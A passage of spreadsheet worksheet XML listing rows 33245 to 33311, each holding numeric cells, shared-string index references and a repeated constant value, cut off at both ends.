        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33245" ht="15.75" customHeight="1">
      <c r="A33245" s="1">
        <v>2526.0</v>
      </c>
      <c r="B33245" s="2">
        <v>3.4076296E7</v>
      </c>
      <c r="C33245" s="2" t="s">
        <v>32001</v>
      </c>
      <c r="D33245" s="2">
        <v>1.0</v>
      </c>
      <c r="E33245" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33245" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33246" ht="15.75" customHeight="1">
      <c r="A33246" s="1">
        <v>2882.0</v>
      </c>
      <c r="B33246" s="2">
        <v>3.5669538E7</v>
      </c>
      <c r="C33246" s="2" t="s">
        <v>32002</v>
      </c>
      <c r="D33246" s="2">
        <v>1.0</v>
      </c>
      <c r="E33246" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33246" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33247" ht="15.75" customHeight="1">
      <c r="A33247" s="1">
        <v>3227.0</v>
      </c>
      <c r="B33247" s="2">
        <v>3.7340848E7</v>
      </c>
      <c r="C33247" s="2" t="s">
        <v>32003</v>
      </c>
      <c r="D33247" s="2">
        <v>1.0</v>
      </c>
      <c r="E33247" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33247" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33248" ht="15.75" customHeight="1">
      <c r="A33248" s="1">
        <v>3432.0</v>
      </c>
      <c r="B33248" s="2">
        <v>3.8203038E7</v>
      </c>
      <c r="C33248" s="2" t="s">
        <v>32004</v>
      </c>
      <c r="D33248" s="2">
        <v>1.0</v>
      </c>
      <c r="E33248" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33248" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33249" ht="15.75" customHeight="1">
      <c r="A33249" s="1">
        <v>3506.0</v>
      </c>
      <c r="B33249" s="2">
        <v>3.8539737E7</v>
      </c>
      <c r="C33249" s="2" t="s">
        <v>32005</v>
      </c>
      <c r="D33249" s="2">
        <v>1.0</v>
      </c>
      <c r="E33249" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33249" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33250" ht="15.75" customHeight="1">
      <c r="A33250" s="1">
        <v>3664.0</v>
      </c>
      <c r="B33250" s="2">
        <v>3.9368302E7</v>
      </c>
      <c r="C33250" s="2" t="s">
        <v>32006</v>
      </c>
      <c r="D33250" s="2">
        <v>1.0</v>
      </c>
      <c r="E33250" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33250" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33251" ht="15.75" customHeight="1">
      <c r="A33251" s="1">
        <v>4152.0</v>
      </c>
      <c r="B33251" s="2">
        <v>4.1442266E7</v>
      </c>
      <c r="C33251" s="2" t="s">
        <v>32007</v>
      </c>
      <c r="D33251" s="2">
        <v>1.0</v>
      </c>
      <c r="E33251" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33251" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33252" ht="15.75" customHeight="1">
      <c r="A33252" s="1">
        <v>4234.0</v>
      </c>
      <c r="B33252" s="2">
        <v>4.1771067E7</v>
      </c>
      <c r="C33252" s="2" t="s">
        <v>32008</v>
      </c>
      <c r="D33252" s="2">
        <v>1.0</v>
      </c>
      <c r="E33252" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33252" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33253" ht="15.75" customHeight="1">
      <c r="A33253" s="1">
        <v>4683.0</v>
      </c>
      <c r="B33253" s="2">
        <v>4.3199059E7</v>
      </c>
      <c r="C33253" s="2" t="s">
        <v>32009</v>
      </c>
      <c r="D33253" s="2">
        <v>1.0</v>
      </c>
      <c r="E33253" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33253" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33254" ht="15.75" customHeight="1">
      <c r="A33254" s="1">
        <v>4823.0</v>
      </c>
      <c r="B33254" s="2">
        <v>4.3624028E7</v>
      </c>
      <c r="C33254" s="2" t="s">
        <v>32010</v>
      </c>
      <c r="D33254" s="2">
        <v>1.0</v>
      </c>
      <c r="E33254" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33254" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33255" ht="15.75" customHeight="1">
      <c r="A33255" s="1">
        <v>5577.0</v>
      </c>
      <c r="B33255" s="2">
        <v>4.6044932E7</v>
      </c>
      <c r="C33255" s="2" t="s">
        <v>32011</v>
      </c>
      <c r="D33255" s="2">
        <v>1.0</v>
      </c>
      <c r="E33255" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33255" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33256" ht="15.75" customHeight="1">
      <c r="A33256" s="1">
        <v>5770.0</v>
      </c>
      <c r="B33256" s="2">
        <v>4.6706311E7</v>
      </c>
      <c r="C33256" s="2" t="s">
        <v>32012</v>
      </c>
      <c r="D33256" s="2">
        <v>1.0</v>
      </c>
      <c r="E33256" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33256" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33257" ht="15.75" customHeight="1">
      <c r="A33257" s="1">
        <v>5872.0</v>
      </c>
      <c r="B33257" s="2">
        <v>4.7025913E7</v>
      </c>
      <c r="C33257" s="2" t="s">
        <v>32013</v>
      </c>
      <c r="D33257" s="2">
        <v>1.0</v>
      </c>
      <c r="E33257" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33257" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33258" ht="15.75" customHeight="1">
      <c r="A33258" s="1">
        <v>6732.0</v>
      </c>
      <c r="B33258" s="2">
        <v>4.9322437E7</v>
      </c>
      <c r="C33258" s="2" t="s">
        <v>32014</v>
      </c>
      <c r="D33258" s="2">
        <v>1.0</v>
      </c>
      <c r="E33258" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33258" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33259" ht="15.75" customHeight="1">
      <c r="A33259" s="1">
        <v>6972.0</v>
      </c>
      <c r="B33259" s="2">
        <v>5.0004263E7</v>
      </c>
      <c r="C33259" s="2" t="s">
        <v>32015</v>
      </c>
      <c r="D33259" s="2">
        <v>1.0</v>
      </c>
      <c r="E33259" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33259" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33260" ht="15.75" customHeight="1">
      <c r="A33260" s="1">
        <v>7967.0</v>
      </c>
      <c r="B33260" s="2">
        <v>5.2694252E7</v>
      </c>
      <c r="C33260" s="2" t="s">
        <v>32016</v>
      </c>
      <c r="D33260" s="2">
        <v>1.0</v>
      </c>
      <c r="E33260" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33260" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33261" ht="15.75" customHeight="1">
      <c r="A33261" s="1">
        <v>8099.0</v>
      </c>
      <c r="B33261" s="2">
        <v>5.3060119E7</v>
      </c>
      <c r="C33261" s="2" t="s">
        <v>32017</v>
      </c>
      <c r="D33261" s="2">
        <v>1.0</v>
      </c>
      <c r="E33261" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33261" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33262" ht="15.75" customHeight="1">
      <c r="A33262" s="1">
        <v>8721.0</v>
      </c>
      <c r="B33262" s="2">
        <v>5.4490772E7</v>
      </c>
      <c r="C33262" s="2" t="s">
        <v>32018</v>
      </c>
      <c r="D33262" s="2">
        <v>1.0</v>
      </c>
      <c r="E33262" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33262" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33263" ht="15.75" customHeight="1">
      <c r="A33263" s="1">
        <v>8868.0</v>
      </c>
      <c r="B33263" s="2">
        <v>5.4745576E7</v>
      </c>
      <c r="C33263" s="2" t="s">
        <v>32019</v>
      </c>
      <c r="D33263" s="2">
        <v>1.0</v>
      </c>
      <c r="E33263" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33263" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33264" ht="15.75" customHeight="1">
      <c r="A33264" s="1">
        <v>9066.0</v>
      </c>
      <c r="B33264" s="2">
        <v>5.511948E7</v>
      </c>
      <c r="C33264" s="2" t="s">
        <v>32020</v>
      </c>
      <c r="D33264" s="2">
        <v>1.0</v>
      </c>
      <c r="E33264" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33264" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33265" ht="15.75" customHeight="1">
      <c r="A33265" s="1">
        <v>9207.0</v>
      </c>
      <c r="B33265" s="2">
        <v>5.5409526E7</v>
      </c>
      <c r="C33265" s="2" t="s">
        <v>32021</v>
      </c>
      <c r="D33265" s="2">
        <v>1.0</v>
      </c>
      <c r="E33265" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33265" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33266" ht="15.75" customHeight="1">
      <c r="A33266" s="1">
        <v>9741.0</v>
      </c>
      <c r="B33266" s="2">
        <v>5.6460855E7</v>
      </c>
      <c r="C33266" s="2" t="s">
        <v>32022</v>
      </c>
      <c r="D33266" s="2">
        <v>1.0</v>
      </c>
      <c r="E33266" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33266" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33267" ht="15.75" customHeight="1">
      <c r="A33267" s="1">
        <v>9792.0</v>
      </c>
      <c r="B33267" s="2">
        <v>5.6532619E7</v>
      </c>
      <c r="C33267" s="2" t="s">
        <v>32023</v>
      </c>
      <c r="D33267" s="2">
        <v>1.0</v>
      </c>
      <c r="E33267" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33267" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33268" ht="15.75" customHeight="1">
      <c r="A33268" s="1">
        <v>9955.0</v>
      </c>
      <c r="B33268" s="2">
        <v>5.6910425E7</v>
      </c>
      <c r="C33268" s="2" t="s">
        <v>32024</v>
      </c>
      <c r="D33268" s="2">
        <v>1.0</v>
      </c>
      <c r="E33268" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33268" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33269" ht="15.75" customHeight="1">
      <c r="A33269" s="1">
        <v>10283.0</v>
      </c>
      <c r="B33269" s="2">
        <v>5.7628197E7</v>
      </c>
      <c r="C33269" s="2" t="s">
        <v>32025</v>
      </c>
      <c r="D33269" s="2">
        <v>1.0</v>
      </c>
      <c r="E33269" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33269" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33270" ht="15.75" customHeight="1">
      <c r="A33270" s="1">
        <v>10399.0</v>
      </c>
      <c r="B33270" s="2">
        <v>9395579.0</v>
      </c>
      <c r="C33270" s="2" t="s">
        <v>32026</v>
      </c>
      <c r="D33270" s="2">
        <v>1.0</v>
      </c>
      <c r="E33270" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33270" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33271" ht="15.75" customHeight="1">
      <c r="A33271" s="1">
        <v>10685.0</v>
      </c>
      <c r="B33271" s="2">
        <v>1.4696918E7</v>
      </c>
      <c r="C33271" s="2" t="s">
        <v>32027</v>
      </c>
      <c r="D33271" s="2">
        <v>1.0</v>
      </c>
      <c r="E33271" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33271" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33272" ht="15.75" customHeight="1">
      <c r="A33272" s="1">
        <v>10862.0</v>
      </c>
      <c r="B33272" s="2">
        <v>1.6343425E7</v>
      </c>
      <c r="C33272" s="2" t="s">
        <v>32028</v>
      </c>
      <c r="D33272" s="2">
        <v>1.0</v>
      </c>
      <c r="E33272" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33272" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33273" ht="15.75" customHeight="1">
      <c r="A33273" s="1">
        <v>11188.0</v>
      </c>
      <c r="B33273" s="2">
        <v>1.9816827E7</v>
      </c>
      <c r="C33273" s="2" t="s">
        <v>32029</v>
      </c>
      <c r="D33273" s="2">
        <v>1.0</v>
      </c>
      <c r="E33273" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33273" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33274" ht="15.75" customHeight="1">
      <c r="A33274" s="1">
        <v>11353.0</v>
      </c>
      <c r="B33274" s="2">
        <v>2.1294251E7</v>
      </c>
      <c r="C33274" s="2" t="s">
        <v>32030</v>
      </c>
      <c r="D33274" s="2">
        <v>1.0</v>
      </c>
      <c r="E33274" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33274" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33275" ht="15.75" customHeight="1">
      <c r="A33275" s="1">
        <v>11447.0</v>
      </c>
      <c r="B33275" s="2">
        <v>2.1775735E7</v>
      </c>
      <c r="C33275" s="2" t="s">
        <v>32031</v>
      </c>
      <c r="D33275" s="2">
        <v>1.0</v>
      </c>
      <c r="E33275" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33275" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33276" ht="15.75" customHeight="1">
      <c r="A33276" s="1">
        <v>11569.0</v>
      </c>
      <c r="B33276" s="2">
        <v>2.276332E7</v>
      </c>
      <c r="C33276" s="2" t="s">
        <v>32032</v>
      </c>
      <c r="D33276" s="2">
        <v>1.0</v>
      </c>
      <c r="E33276" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33276" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33277" ht="15.75" customHeight="1">
      <c r="A33277" s="1">
        <v>11909.0</v>
      </c>
      <c r="B33277" s="2">
        <v>2.5213559E7</v>
      </c>
      <c r="C33277" s="2" t="s">
        <v>32033</v>
      </c>
      <c r="D33277" s="2">
        <v>1.0</v>
      </c>
      <c r="E33277" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33277" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33278" ht="15.75" customHeight="1">
      <c r="A33278" s="1">
        <v>11971.0</v>
      </c>
      <c r="B33278" s="2">
        <v>2.5719963E7</v>
      </c>
      <c r="C33278" s="2" t="s">
        <v>32034</v>
      </c>
      <c r="D33278" s="2">
        <v>1.0</v>
      </c>
      <c r="E33278" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33278" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33279" ht="15.75" customHeight="1">
      <c r="A33279" s="1">
        <v>12014.0</v>
      </c>
      <c r="B33279" s="2">
        <v>2.6044785E7</v>
      </c>
      <c r="C33279" s="2" t="s">
        <v>32035</v>
      </c>
      <c r="D33279" s="2">
        <v>1.0</v>
      </c>
      <c r="E33279" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33279" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33280" ht="15.75" customHeight="1">
      <c r="A33280" s="1">
        <v>12134.0</v>
      </c>
      <c r="B33280" s="2">
        <v>2.6980742E7</v>
      </c>
      <c r="C33280" s="2" t="s">
        <v>32036</v>
      </c>
      <c r="D33280" s="2">
        <v>1.0</v>
      </c>
      <c r="E33280" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33280" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33281" ht="15.75" customHeight="1">
      <c r="A33281" s="1">
        <v>12242.0</v>
      </c>
      <c r="B33281" s="2">
        <v>2.7885802E7</v>
      </c>
      <c r="C33281" s="2" t="s">
        <v>32037</v>
      </c>
      <c r="D33281" s="2">
        <v>1.0</v>
      </c>
      <c r="E33281" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33281" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33282" ht="15.75" customHeight="1">
      <c r="A33282" s="1">
        <v>12592.0</v>
      </c>
      <c r="B33282" s="2">
        <v>3.0060614E7</v>
      </c>
      <c r="C33282" s="2" t="s">
        <v>32038</v>
      </c>
      <c r="D33282" s="2">
        <v>1.0</v>
      </c>
      <c r="E33282" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33282" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33283" ht="15.75" customHeight="1">
      <c r="A33283" s="1">
        <v>12663.0</v>
      </c>
      <c r="B33283" s="2">
        <v>3.0529983E7</v>
      </c>
      <c r="C33283" s="2" t="s">
        <v>32039</v>
      </c>
      <c r="D33283" s="2">
        <v>1.0</v>
      </c>
      <c r="E33283" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33283" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33284" ht="15.75" customHeight="1">
      <c r="A33284" s="1">
        <v>12680.0</v>
      </c>
      <c r="B33284" s="2">
        <v>3.0625967E7</v>
      </c>
      <c r="C33284" s="2" t="s">
        <v>32040</v>
      </c>
      <c r="D33284" s="2">
        <v>1.0</v>
      </c>
      <c r="E33284" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33284" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33285" ht="15.75" customHeight="1">
      <c r="A33285" s="1">
        <v>13413.0</v>
      </c>
      <c r="B33285" s="2">
        <v>3.5015482E7</v>
      </c>
      <c r="C33285" s="2" t="s">
        <v>32041</v>
      </c>
      <c r="D33285" s="2">
        <v>1.0</v>
      </c>
      <c r="E33285" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33285" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33286" ht="15.75" customHeight="1">
      <c r="A33286" s="1">
        <v>13610.0</v>
      </c>
      <c r="B33286" s="2">
        <v>3.5833405E7</v>
      </c>
      <c r="C33286" s="2" t="s">
        <v>32042</v>
      </c>
      <c r="D33286" s="2">
        <v>1.0</v>
      </c>
      <c r="E33286" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33286" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33287" ht="15.75" customHeight="1">
      <c r="A33287" s="1">
        <v>14477.0</v>
      </c>
      <c r="B33287" s="2">
        <v>3.9522216E7</v>
      </c>
      <c r="C33287" s="2" t="s">
        <v>32043</v>
      </c>
      <c r="D33287" s="2">
        <v>1.0</v>
      </c>
      <c r="E33287" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33287" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33288" ht="15.75" customHeight="1">
      <c r="A33288" s="1">
        <v>14515.0</v>
      </c>
      <c r="B33288" s="2">
        <v>3.9748333E7</v>
      </c>
      <c r="C33288" s="2" t="s">
        <v>32044</v>
      </c>
      <c r="D33288" s="2">
        <v>1.0</v>
      </c>
      <c r="E33288" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33288" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33289" ht="15.75" customHeight="1">
      <c r="A33289" s="1">
        <v>14556.0</v>
      </c>
      <c r="B33289" s="2">
        <v>3.9970638E7</v>
      </c>
      <c r="C33289" s="2" t="s">
        <v>32045</v>
      </c>
      <c r="D33289" s="2">
        <v>1.0</v>
      </c>
      <c r="E33289" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33289" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33290" ht="15.75" customHeight="1">
      <c r="A33290" s="1">
        <v>14898.0</v>
      </c>
      <c r="B33290" s="2">
        <v>4.1148769E7</v>
      </c>
      <c r="C33290" s="2" t="s">
        <v>32046</v>
      </c>
      <c r="D33290" s="2">
        <v>1.0</v>
      </c>
      <c r="E33290" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33290" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33291" ht="15.75" customHeight="1">
      <c r="A33291" s="1">
        <v>14919.0</v>
      </c>
      <c r="B33291" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C33291" s="2" t="s">
        <v>32047</v>
      </c>
      <c r="D33291" s="2">
        <v>1.0</v>
      </c>
      <c r="E33291" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33291" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33292" ht="15.75" customHeight="1">
      <c r="A33292" s="1">
        <v>15282.0</v>
      </c>
      <c r="B33292" s="2">
        <v>4.2400766E7</v>
      </c>
      <c r="C33292" s="2" t="s">
        <v>32048</v>
      </c>
      <c r="D33292" s="2">
        <v>1.0</v>
      </c>
      <c r="E33292" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33292" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33293" ht="15.75" customHeight="1">
      <c r="A33293" s="1">
        <v>15486.0</v>
      </c>
      <c r="B33293" s="2">
        <v>4.3180746E7</v>
      </c>
      <c r="C33293" s="2" t="s">
        <v>32049</v>
      </c>
      <c r="D33293" s="2">
        <v>1.0</v>
      </c>
      <c r="E33293" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33293" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33294" ht="15.75" customHeight="1">
      <c r="A33294" s="1">
        <v>15902.0</v>
      </c>
      <c r="B33294" s="2">
        <v>4.4608488E7</v>
      </c>
      <c r="C33294" s="2" t="s">
        <v>32050</v>
      </c>
      <c r="D33294" s="2">
        <v>1.0</v>
      </c>
      <c r="E33294" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33294" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33295" ht="15.75" customHeight="1">
      <c r="A33295" s="1">
        <v>16031.0</v>
      </c>
      <c r="B33295" s="2">
        <v>4.5108392E7</v>
      </c>
      <c r="C33295" s="2" t="s">
        <v>32051</v>
      </c>
      <c r="D33295" s="2">
        <v>1.0</v>
      </c>
      <c r="E33295" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33295" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33296" ht="15.75" customHeight="1">
      <c r="A33296" s="1">
        <v>16332.0</v>
      </c>
      <c r="B33296" s="2">
        <v>4.6042935E7</v>
      </c>
      <c r="C33296" s="2" t="s">
        <v>32052</v>
      </c>
      <c r="D33296" s="2">
        <v>1.0</v>
      </c>
      <c r="E33296" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33296" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33297" ht="15.75" customHeight="1">
      <c r="A33297" s="1">
        <v>17269.0</v>
      </c>
      <c r="B33297" s="2">
        <v>4.9164317E7</v>
      </c>
      <c r="C33297" s="2" t="s">
        <v>32053</v>
      </c>
      <c r="D33297" s="2">
        <v>1.0</v>
      </c>
      <c r="E33297" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33297" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33298" ht="15.75" customHeight="1">
      <c r="A33298" s="1">
        <v>17584.0</v>
      </c>
      <c r="B33298" s="2">
        <v>5.027548E7</v>
      </c>
      <c r="C33298" s="2" t="s">
        <v>32054</v>
      </c>
      <c r="D33298" s="2">
        <v>1.0</v>
      </c>
      <c r="E33298" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33298" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33299" ht="15.75" customHeight="1">
      <c r="A33299" s="1">
        <v>18046.0</v>
      </c>
      <c r="B33299" s="2">
        <v>5.1560872E7</v>
      </c>
      <c r="C33299" s="2" t="s">
        <v>32055</v>
      </c>
      <c r="D33299" s="2">
        <v>1.0</v>
      </c>
      <c r="E33299" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33299" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33300" ht="15.75" customHeight="1">
      <c r="A33300" s="1">
        <v>18113.0</v>
      </c>
      <c r="B33300" s="2">
        <v>5.1751214E7</v>
      </c>
      <c r="C33300" s="2" t="s">
        <v>32056</v>
      </c>
      <c r="D33300" s="2">
        <v>1.0</v>
      </c>
      <c r="E33300" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33300" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33301" ht="15.75" customHeight="1">
      <c r="A33301" s="1">
        <v>18605.0</v>
      </c>
      <c r="B33301" s="2">
        <v>5.3281503E7</v>
      </c>
      <c r="C33301" s="2" t="s">
        <v>32057</v>
      </c>
      <c r="D33301" s="2">
        <v>1.0</v>
      </c>
      <c r="E33301" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33301" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33302" ht="15.75" customHeight="1">
      <c r="A33302" s="1">
        <v>18948.0</v>
      </c>
      <c r="B33302" s="2">
        <v>5.4345333E7</v>
      </c>
      <c r="C33302" s="2" t="s">
        <v>32058</v>
      </c>
      <c r="D33302" s="2">
        <v>1.0</v>
      </c>
      <c r="E33302" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33302" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33303" ht="15.75" customHeight="1">
      <c r="A33303" s="1">
        <v>19168.0</v>
      </c>
      <c r="B33303" s="2">
        <v>5.4934939E7</v>
      </c>
      <c r="C33303" s="2" t="s">
        <v>32059</v>
      </c>
      <c r="D33303" s="2">
        <v>1.0</v>
      </c>
      <c r="E33303" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33303" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33304" ht="15.75" customHeight="1">
      <c r="A33304" s="1">
        <v>19855.0</v>
      </c>
      <c r="B33304" s="2">
        <v>5.7151182E7</v>
      </c>
      <c r="C33304" s="2" t="s">
        <v>32060</v>
      </c>
      <c r="D33304" s="2">
        <v>1.0</v>
      </c>
      <c r="E33304" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33304" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33305" ht="15.75" customHeight="1">
      <c r="A33305" s="1">
        <v>20009.0</v>
      </c>
      <c r="B33305" s="2">
        <v>5.7738276E7</v>
      </c>
      <c r="C33305" s="2" t="s">
        <v>32061</v>
      </c>
      <c r="D33305" s="2">
        <v>1.0</v>
      </c>
      <c r="E33305" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33305" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33306" ht="15.75" customHeight="1">
      <c r="A33306" s="1">
        <v>20068.0</v>
      </c>
      <c r="B33306" s="2">
        <v>8737379.0</v>
      </c>
      <c r="C33306" s="2" t="s">
        <v>32062</v>
      </c>
      <c r="D33306" s="2">
        <v>1.0</v>
      </c>
      <c r="E33306" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33306" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33307" ht="15.75" customHeight="1">
      <c r="A33307" s="1">
        <v>20202.0</v>
      </c>
      <c r="B33307" s="2">
        <v>1.05882E7</v>
      </c>
      <c r="C33307" s="2" t="s">
        <v>32063</v>
      </c>
      <c r="D33307" s="2">
        <v>1.0</v>
      </c>
      <c r="E33307" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33307" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33308" ht="15.75" customHeight="1">
      <c r="A33308" s="1">
        <v>20780.0</v>
      </c>
      <c r="B33308" s="2">
        <v>1.5030951E7</v>
      </c>
      <c r="C33308" s="2" t="s">
        <v>32064</v>
      </c>
      <c r="D33308" s="2">
        <v>1.0</v>
      </c>
      <c r="E33308" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33308" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33309" ht="15.75" customHeight="1">
      <c r="A33309" s="1">
        <v>21047.0</v>
      </c>
      <c r="B33309" s="2">
        <v>1.7705014E7</v>
      </c>
      <c r="C33309" s="2" t="s">
        <v>32065</v>
      </c>
      <c r="D33309" s="2">
        <v>1.0</v>
      </c>
      <c r="E33309" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33309" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33310" ht="15.75" customHeight="1">
      <c r="A33310" s="1">
        <v>21419.0</v>
      </c>
      <c r="B33310" s="2">
        <v>2.203907E7</v>
      </c>
      <c r="C33310" s="2" t="s">
        <v>32066</v>
      </c>
      <c r="D33310" s="2">
        <v>1.0</v>
      </c>
      <c r="E33310" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33310" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33311" ht="15.75" customHeight="1">
      <c r="A33311" s="1">
        <v>21624.0</v>
      </c>
      <c r="B33311" s="2">
        <v>2.4613869E7</v>
      </c>
      <c r="C33311" s="2" t="s">
        <v>32067</v>
      </c>
      <c r="D33311" s="2">
        <v>1.0</v>
      </c>
      <c r="E33311" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33311" s="2">
